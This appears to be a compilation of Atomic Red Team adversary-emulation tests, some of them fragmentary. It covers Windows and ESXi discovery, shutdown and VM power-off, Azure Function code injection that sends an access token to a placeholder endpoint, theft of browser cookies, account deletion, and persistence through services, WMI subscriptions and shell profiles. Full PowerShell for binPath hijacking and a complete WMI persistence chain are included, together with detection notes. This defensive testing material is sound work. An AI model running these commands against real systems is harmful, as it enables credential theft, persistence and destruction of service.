Description: Windows Defender enumeration via different built-in Windows native tools.
When successfully executed, information about Windows Defender is displayed.
Description: Enumerates the Windows Firewall to retrieve firewall rules from the target computer.
When successfully executed, details of the Windows Firewall are displayed.
Description: In this test, a WMIC command is used to probe the local Windows system for the configuration of Windows Defender's exclusions. This command targets the MSFT_MpPreference
class within the Windows Management Instrumentation (WMI) namespace, allowing the retrieval of critical settings such as disabled real-time monitoring and specified
exclusion paths, file extensions, and processes. Attackers might use this approach to understand what is excluded from antivirus scans, enabling further exploitation.
T1518 - Software Discovery
Find and Display Internet Explorer Browser Version
Description: Query the registry to determine the version of Internet Explorer installed on the system.
Upon execution, version information about Internet Explorer will be displayed.
Description: Query the registry to determine software and versions installed on the system. Upon execution a table of
software name and version information will be displayed.
Description: Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Description: Upon successful execution, this test will enumerate all resources that are contained within a valid Azure subscription.
The enumerated resources will be displayed on screen, and several CSV files and folders listing the resources discovered by the script will be written to a specified directory.
See https://dev.to/cheahengsoon/enumerating-subscription-information-with-microburst-35a1
Prereq: The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Get-AzDomainInfo.ps1"){exit 0} else {exit 1}
$allowSharedKeyAccess = az storage account show --name "storage_account_name_example" --query "allowSharedKeyAccess"
if ($allowSharedKeyAccess -eq "false") {
    # $allowSharedKeyAccess could be true or null
    Write-Output "Shared key access is disabled for this storage account."
} else {
    $connectionString = az storage account show-connection-string --name "storage_account_name_example" --query connectionString --output tsv
    if ($LASTEXITCODE -eq 0) {
        # Upload new blob version if download of existing blob succeeded
        az storage blob upload --connection-string $connectionString --container-name "container_name_example" --name "blob_example" --file "$env:temp/T1528_function_code.zip" --overwrite true
    } else {
        Write-Output "Download original function code failed."
        exit 1
    }
}
Description: This test injects code into an Azure Function (RCE).
Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
Similar to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers with the source code of an Azure Function to perform subscription privilege escalation by retrieving the identity access token of an Azure Functions instance. In this case, the prepared zip file (the underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
Note:
- The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
- For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
$insertContent = Get-Content -Path "$T1528/src/code_to_insert.py" -Raw  # Load the content of the insert file
$content = Get-Content -Path $tmpFunctionCode -Raw
# Inject code to file
$content = $insertContent + "`n" + $content  # Insert the new code at the beginning
$content | Set-Content -Path $tmpFunctionCode  # Write the modified content to the file
# Upload file to file share
az storage file upload --account-name "storage_account_name_example" --share-name "file_share_name_example" -p "site/wwwroot/function_app.py" --source $tmpFunctionCode --only-show-errors
if ($LASTEXITCODE -ne 0) {
    Write-Output "Function code upload failed."
    exit 1
}
Write-Output "Uploaded the tampered file"
} elseif ("insert_code" -eq "replace_file") {
    az storage file upload --account-name "storage_account_name_example" --share-name "file_share_name_example" -p "site/wwwroot/function_app.py" --source "$T1528/src/code_to_insert.py" --only-show-errors
    if ($LASTEXITCODE -ne 0) {
        Write-Output "Function code upload failed."
        exit 1
    }
    Write-Output "Uploaded the tampered file"
} else {
    Write-Output "Please choose a valid execution_option"
    exit 1
}
} else {
    Write-Output "Download original function code failed."
    exit 1
}
Description: This test injects code into an Azure Function (RCE) to perform subscription privilege escalation by retrieving the identity access token of an Azure Functions instance.
Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
Once executed, the endpoint "https://changeme.net" will receive the access token when the function app is executed on behalf of the tenant. The function may be triggered manually by authorized users, triggered at regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listing virtual machines).
Note:
- The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
- For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1528 "Azure - Functions code upload - Functions code injection via Blob upload".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
- Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
- The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
Execution options: Defined by the input field execution_option
- insert_code: This option (1) downloads the existing function code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share file).
- replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share file).
if ($LASTEXITCODE -eq 0) {
    Write-Output "Uploaded original version of function code."
    # Delete the tmp injected file if upload succeeded
    if ("insert_code" -eq "insert_code") {
        $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
        Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
        Write-Output "Deleted tmp file: $($tmpFunctionCode)"
    }
    # Delete tmp original file
    Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
    Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
} else {
    Write-Output "Upload original function code failed."
}
T1529 - System Shutdown/Reboot
Shutdown System - Windows
shutdown /s /t 1
Description: This test shuts down a Windows system.
T1529 - System Shutdown/Reboot
Restart System - Windows
shutdown /r /t 1
Description: This test restarts a Windows system.
T1529 - System Shutdown/Reboot
Restart System via `shutdown` - FreeBSD/macOS/Linux
shutdown -r now
Description: This test restarts a FreeBSD/macOS/Linux system.
T1529 - System Shutdown/Reboot
Shutdown System via `shutdown` - FreeBSD/macOS/Linux
shutdown -h now
Description: This test shuts down a FreeBSD/macOS/Linux system using a halt.
T1529 - System Shutdown/Reboot
Restart System via `reboot` - FreeBSD/macOS/Linux
reboot
Description: This test restarts a FreeBSD/macOS/Linux system via `reboot`.
T1529 - System Shutdown/Reboot
Shutdown System via `halt` - FreeBSD/Linux
halt -p
Description: This test shuts down a FreeBSD/Linux system using `halt`.
T1529 - System Shutdown/Reboot
Reboot System via `halt` - FreeBSD
halt -r
Description: This test restarts a FreeBSD system using `halt`.
T1529 - System Shutdown/Reboot
Reboot System via `halt` - Linux
halt --reboot
Description: This test restarts a Linux system using `halt`.
T1529 - System Shutdown/Reboot
Shutdown System via `poweroff` - FreeBSD/Linux
poweroff
Description: This test shuts down a FreeBSD/Linux system using `poweroff`.
T1529 - System Shutdown/Reboot
Reboot System via `poweroff` - FreeBSD
poweroff -r 3
Description: This test restarts a FreeBSD system using `poweroff`.
T1529 - System Shutdown/Reboot
Reboot System via `poweroff` - Linux
poweroff --reboot
Description: This test restarts a Linux system using `poweroff`.
T1529 - System Shutdown/Reboot
Logoff System - Windows
shutdown /l
Description: This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
Description: In VMware ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with the prefix vmx.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
ESXi - Avoslocker enumerates VMs and forcefully kills VMs
Description: Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power them off.
[Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
ESXi - vim-cmd Used to Power Off VMs
echo "" | "..\ExternalPayloads\plink.exe" -batch "atomic.local" -ssh -l root -pw "password" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/power.off $i & done"
Description: Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
Abuse of Linux Magic System Request Key for Reboot
echo "b" > /proc/sysrq-trigger
Description: Adversaries with root or otherwise sufficient privileges can silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can force a reboot.
if ($allowSharedKeyAccess -eq "false") {
    # $allowSharedKeyAccess could be true or null
    Write-Output "Shared key access is disabled for this storage account."
} else {
    Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..."
    $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
Description: This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName".
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
net user AtomicAdministrator User2ChangePW! /add
net.exe user AtomicAdministrator HuHuHUHoHo283283@dJD
Description: Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
the password "HuHuHUHoHo283283".
Cleanup:
net.exe user AtomicAdministrator /delete >nul 2>&1
T1531 - Account Access Removal
Delete User - Windows
net user AtomicUser User2DeletePW! /add
net.exe user AtomicUser /delete
Description: Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
T1531 - Account Access Removal
Remove Account From Domain Admin Group
$PWord = ConvertTo-SecureString -String password -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord
if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){
    Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False
} else{
    write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red
}
Description: This test will remove an account from the domain admins group
Prereq: Requires the Active Directory module for PowerShell to be installed.
Description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
Prereq: Check if AzureAD PowerShell module is installed
Get-InstalledModule -Name AzureAD
Prereq: Check if AzureAD PowerShell module is installed
Update the input arguments so the userprincipalname value is accurate for your environment
Cleanup:
N/A
T1531 - Account Access Removal
Azure AD - Delete user via Azure CLI
az login
$userprincipalname = "atomicredteam@yourdomain.com"
az ad user delete --id $userprincipalname
Description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
Prereq: Check if Azure CLI is installed and install manually
az account list
Prereq: Check if Azure CLI is installed and install via PowerShell
az account list
Prereq: Update the userprincipalname to meet your requirements
Update the input arguments so the userprincipalname value is accurate for your environment
Description: This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function.
Note: If Firefox is running, the process will be killed to ensure that the DB file isn't locked.
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
Prereq: Sqlite3 must exist at (..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe)
if (Test-Path "..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
Description: This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function.
Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft.
Note: If Chrome is running, the process will be killed to ensure that the DB file isn't locked.
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
Prereq: Sqlite3 must exist at (..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe)
if (Test-Path "..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
Description: The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
If successful, this test will output a list of cookies.
Note: Chrome processes will be killed during this test.
See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
Prereq: Install Go
go version
Prereq: Download and compile WhiteChocolateMacademiaNut
/tmp/WhiteChocolateMacademiaNut/chocolate -h
Cleanup:
rm -rf /tmp/WhiteChocolateMacademiaNut
T1539 - Steal Web Session Cookie
Steal Chrome v127+ cookies via Remote Debugging (Windows)
Description: Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
T1539 - Steal Web Session Cookie
Copy Safari BinaryCookies files using AppleScript
osascript \
  -e 'tell application "Finder"' \
  -e 'set destinationFolderPath to POSIX file "/private/tmp"' \
  -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' \
  -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' \
  -e 'end tell'
Description: This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
Description: Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
- https://github.com/tandasat/WPBT-Builder
T1543.002 - Create or Modify System Process: SysV/Systemd Service
Create Systemd Service file, Enable the service , Modify and Reload the service.
echo "#!/bin/bash" > /etc/init.d/T1543.002
echo "### BEGIN INIT INFO" >> /etc/init.d/T1543.002
echo "# Provides : Atomic Test T1543.002" >> /etc/init.d/T1543.002
echo "# Required-Start: \$all" >> /etc/init.d/T1543.002
echo "# Required-Stop : " >> /etc/init.d/T1543.002
echo "# Default-Start: 2 3 4 5" >> /etc/init.d/T1543.002
echo "# Default-Stop: " >> /etc/init.d/T1543.002
echo "# Short Description: Atomic Test for Systemd Service Creation" >> /etc/init.d/T1543.002
echo "### END INIT INFO" >> /etc/init.d/T1543.002
# the base64 below decodes to a Python one-liner that writes /tmp/T1543.002.systemd.service.creation
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK')) \" " >> /etc/init.d/T1543.002
chmod +x /etc/init.d/T1543.002
# register the init script with the distribution's SysV tooling
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then
  update-rc.d T1543.002 defaults
elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then
  chkconfig T1543.002 on
else
  echo "Please run this test on Ubuntu, Kali or CentOS"
fi
systemctl enable T1543.002
systemctl start T1543.002
# modification step: append a second command (decodes to a one-liner that writes /tmp/T1543.002.systemd.service.modification)
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
Description: This test writes an LSB-style init script to /etc/init.d/T1543.002 and enables it to start at boot; on a systemd host the script is wrapped as a service unit by systemd's SysV compatibility generator, which is why systemctl can enable and start it. Once the service is created and enabled, the test appends a second command to the same script and restarts the service, showing both creation and modification of a system process.
Description: This test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
Description: Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
Description: Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
T1543.003 - Create or Modify System Process: Windows Service
TinyTurla backdoor service w64time
copy "$T1543.003\bin\w64time.dll" %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start= auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time
Description: Runs a DLL as an svchost-hosted service (a new service group plus a ServiceDll value) to emulate the TinyTurla backdoor. Note that sc.exe requires a space after each option name, so it is `start= auto`, not `start=auto`.
[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
Description: Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
Description: This test will use PowerShell to temporarily modify a service to run an arbitrary executable by changing its binary path and will then revert the binary path change, restoring the service to its original state.
This technique was previously observed in SnapMC's use of PowerSploit's Invoke-ServiceAbuse function.
[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
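The two binPath tests above (Fax via cmd, and the PowerShell variant used by SnapMC) share one pattern: record the service's current image path, point it at an arbitrary command, start the service so the Service Control Manager launches that command under the service account, then put the original path back. The following is an added example written for this page, not Atomic Red Team's own code; it uses the Fax service and a PowerShell payload as illustrative defaults and needs an elevated session, since changing service configuration requires SERVICE_CHANGE_CONFIG.

```powershell
# Added example, not Atomic Red Team's code. Swaps a service's binPath to an arbitrary
# command, starts the service so the SCM runs the command, then restores the original
# path and verifies the restore. Defaults mirror the Fax test; change them as needed.

function Invoke-ServiceBinPathSwap {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$Payload
    )

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "service '$ServiceName' not found" }

    # PathName is what the SCM stores in HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath.
    $original = $svc.PathName
    Write-Host "[*] $ServiceName runs as '$($svc.StartName)' with binPath: $original"

    # Win32_Service.Change rewrites ImagePath: the same effect as 'sc config <svc> binPath= ...'
    # or Set-Service -BinaryPathName, but it returns a numeric code we can check.
    $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $Payload }
    if ($r.ReturnValue -ne 0) { throw "Change failed, Win32_Service return code $($r.ReturnValue)" }

    try {
        # services.exe launches the payload under the service account in session 0, so look
        # for it with Get-Process rather than expecting a window. A payload that is not a
        # real service never reports to the SCM, so sc.exe prints error 1053 after its
        # 30 s timeout; that is expected and the payload process has already been started.
        sc.exe start $ServiceName | Out-Null
    }
    finally {
        # Always restore, even if the start step threw.
        $r   = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $original }
        $now = (Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'").PathName
        if ($r.ReturnValue -ne 0 -or $now -ne $original) {
            Write-Warning "binPath for $ServiceName NOT restored; it is currently: $now"
        } else {
            Write-Host "[+] $ServiceName binPath restored to: $original"
        }
    }
}

# Illustrative payload: a PowerShell process that stays alive so it is visible in Get-Process.
$payload = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit -Command "Write-Host T1543.003 binPath test"'
Invoke-ServiceBinPathSwap -ServiceName 'Fax' -Payload $payload
```

Both the swap and the restore land as writes to the service's ImagePath registry value, which Sysmon Event ID 13 (registry value set) records if the configuration covers `HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath`; the System log's event 7045 only covers newly installed services, so reconfiguring an existing one like this does not appear there. The spawned payload has services.exe as its parent, which is the process-tree signal to hunt for.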
T1546.001 - Event Triggered Execution: Change Default File Association
Change Default File Association
assoc .hta=txtfile
Description: From cmd.exe, change the default file association of .hta to the txtfile type, so .hta files open in Notepad.
Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe.
Description: This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
Cleanup:
reg import %userprofile%\backup.reg
del %userprofile%\backup.reg
del %SystemRoot%\System32\evilscreensaver.scr
T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription
Persistence via WMI Event Subscription - CommandLineEventConsumer
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
Description: Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription
Persistence via WMI Event Subscription - ActiveScriptEventConsumer
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
Description: Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
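The two WMI subscription tests above (CommandLineEventConsumer and ActiveScriptEventConsumer) only show the first of the three objects a permanent subscription needs; nothing executes until a filter, a consumer and a binding between them all exist in root\subscription. The block below is an added example for this page, not Atomic Red Team's code: it builds the full chain with the same uptime query, then provides the enumeration and removal a responder needs. The subscription name and the notepad.exe payload are illustrative; run it from an elevated session.

```powershell
# Added example, not Atomic Red Team's code: the full filter -> consumer -> binding chain,
# plus functions to list and remove permanent WMI subscriptions. Run elevated.

$Name    = 'AtomicRedTeam-WMIPersistence-Example'   # illustrative
$Payload = 'C:\Windows\System32\notepad.exe'        # illustrative
$ns      = 'root/subscription'

# 1. Filter: a WQL query polled every 60 s that matches while uptime is between 240 and
#    325 s, i.e. roughly four minutes after boot (the same query the tests above use).
$Filter = New-CimInstance -Namespace $ns -ClassName __EventFilter -Property @{
    Name           = $Name
    EventNameSpace = 'root\CimV2'
    QueryLanguage  = 'WQL'
    Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
}

# 2. Consumer: the action. CommandLineEventConsumer is executed by WmiPrvSE.exe as SYSTEM,
#    which is why the tests expect notepad.exe running as SYSTEM. The ActiveScript variant
#    uses ActiveScriptEventConsumer with ScriptingEngine='VBScript' and ScriptText, and the
#    script runs inside scrcons.exe instead.
$Consumer = New-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -Property @{
    Name                = $Name
    CommandLineTemplate = $Payload
}

# 3. Binding: links filter to consumer. This is the object that makes the subscription live.
$Binding = New-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -Property @{
    Filter   = [ref]$Filter
    Consumer = [ref]$Consumer
}

function Get-WmiPersistence {
    # Everything registered in root/subscription. A stock Windows install has a single
    # binding, 'SCM Event Log Filter' -> 'SCM Event Log Consumer'; anything else needs a look.
    $ns = 'root/subscription'
    foreach ($f in Get-CimInstance -Namespace $ns -ClassName __EventFilter) {
        [pscustomobject]@{ Kind = '__EventFilter'; Name = $f.Name; Detail = $f.Query }
    }
    # Querying the abstract base class returns every consumer type at once.
    foreach ($c in Get-CimInstance -Namespace $ns -ClassName __EventConsumer) {
        $action = @($c.CommandLineTemplate, $c.ExecutablePath, $c.ScriptText, $c.ScriptFileName) -ne $null
        [pscustomobject]@{ Kind = $c.CimClass.CimClassName; Name = $c.Name; Detail = ($action -join ' ') }
    }
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        # Filter and Consumer are object references; their string form includes the key (Name).
        [pscustomobject]@{ Kind = '__FilterToConsumerBinding'; Name = "$($b.Filter)"; Detail = "$($b.Consumer)" }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$Name)
    $ns = 'root/subscription'
    # Binding first: orphaned filters and consumers are inert, the binding is what fires.
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { "$($_.Filter)" -like "*$Name*" -or "$($_.Consumer)" -like "*$Name*" } |
        Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer -Filter "Name='$Name'" | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   -Filter "Name='$Name'" | Remove-CimInstance
}

Get-WmiPersistence | Format-Table -AutoSize
# Remove-WmiPersistence -Name $Name   # cleanup once you have observed the behaviour after reboot
```

On the detection side, Microsoft-Windows-WMI-Activity/Operational event 5861 records each new permanent consumer-to-filter binding, and Sysmon event IDs 19, 20 and 21 cover filter, consumer and binding creation respectively; the process-tree signal is the payload spawning from WmiPrvSE.exe (or scrcons.exe for script consumers) as SYSTEM.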
Description: The following Atomic will utilize MOFComp.exe to load a local MOF file.
The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
To query for the class: gwmi __eventfilter -namespace root\subscription
A successful execution adds the instances defined in the MOF to the root\subscription namespace; the query above checks for the __EventFilter it creates.
Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.
Prereq: MofComp.exe must exist on disk at specified location (c:\windows\system32\wbem\mofcomp.exe)
if (Test-Path "c:\windows\system32\wbem\mofcomp.exe") { exit 0} else { exit 1}
Prereq: MOF file must exist on disk at specified location (T1546.003\src\T1546.003.mof)
if (Test-Path "T1546.003\src\T1546.003.mof") { exit 0} else { exit 1}
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .bash_profile
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.bash_profile
Description: Adds a command to the .bash_profile file of the current user
Cleanup:
# the test appended exactly one line, so strip exactly one
head -n '-1' ~/.bash_profile > /tmp/T1546.004
